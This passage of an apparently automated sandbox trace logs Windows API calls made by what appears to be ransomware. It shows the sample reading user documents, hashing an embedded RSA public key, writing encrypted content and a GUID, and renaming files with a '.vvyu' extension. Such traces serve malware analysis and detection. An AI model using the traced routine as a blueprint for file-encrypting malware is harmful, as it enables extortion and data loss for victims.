lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0185.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0185.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0185.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0185.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0185.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d387f0 | out: hHeap=0x6a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0185.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0185.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0185.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0185.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0185.069] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x25fd, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x25fd, lpOverlapped=0x0) returned 1 [0185.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0185.069] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2602, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.069] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0185.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0185.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0185.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0185.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0185.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0185.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0185.070] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0185.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0185.071] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0185.071] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0185.071] CloseHandle (hObject=0x584) returned 1 [0185.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0185.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0185.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0185.073] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Yqj5KxS1J7UVwOH.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\yqj5kxs1j7uvwoh.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Yqj5KxS1J7UVwOH.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\yqj5kxs1j7uvwoh.pptx.vvyu")) returned 1 [0185.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0185.074] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0185.077] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad673b0, ftCreationTime.dwHighDateTime=0x1d8a5e7, ftLastAccessTime.dwLowDateTime=0x5195d850, ftLastAccessTime.dwHighDateTime=0x1d8a6f6, ftLastWriteTime.dwLowDateTime=0x5195d850, ftLastWriteTime.dwHighDateTime=0x1d8a6f6, nFileSizeHigh=0x0, nFileSizeLow=0x850b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YrqWFs6aPMPbYVu.doc", cAlternateFileName="YRQWFS~1.DOC")) returned 1 [0185.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d387f0 [0185.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0185.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d387f0 | out: hHeap=0x6a0000) returned 1 [0185.078] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\YrqWFs6aPMPbYVu.doc") returned=".doc" [0185.078] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YrqWFs6aPMPbYVu.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\yrqwfs6apmpbyvu.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0185.078] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=34059) returned 1 [0185.078] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0185.081] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x84e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.081] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0185.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0185.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0185.083] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.083] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x850b, lpOverlapped=0x0) returned 1 [0185.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0185.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.215] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0185.218] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0185.218] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0185.218] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0185.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0185.239] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0185.277] GetLastError () returned 0x0 [0185.378] GetLastError () returned 0x0 [0185.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0185.399] GetLastError () returned 0x0 [0185.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0185.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0185.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0185.420] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0185.420] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0185.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0185.440] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0185.440] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0185.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0185.440] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0185.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0185.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0185.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8510) returned 0x2d43778 [0185.502] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0185.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0185.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0185.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0185.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0185.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0185.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d387f0 [0185.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0185.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38838 [0185.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0185.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0185.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0185.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0185.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0185.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0185.809] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0185.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0185.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0185.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0185.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0185.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0185.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0185.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0185.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0185.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0185.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4eac8 [0185.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0185.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0185.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0186.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0186.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0186.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0186.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0186.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0186.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0186.091] GetCurrentThreadId () returned 0x264 [0186.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0186.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37408 [0186.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0186.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0186.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0186.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0186.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.296] GetCurrentThreadId () returned 0x264 [0186.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0186.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0186.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0186.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0186.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0186.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0186.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0186.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0186.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0186.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0186.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0186.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb40 [0186.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0186.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6dc8f8 [0186.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eac8 [0186.380] HeapFree (in: hHeap=0x6a0000, 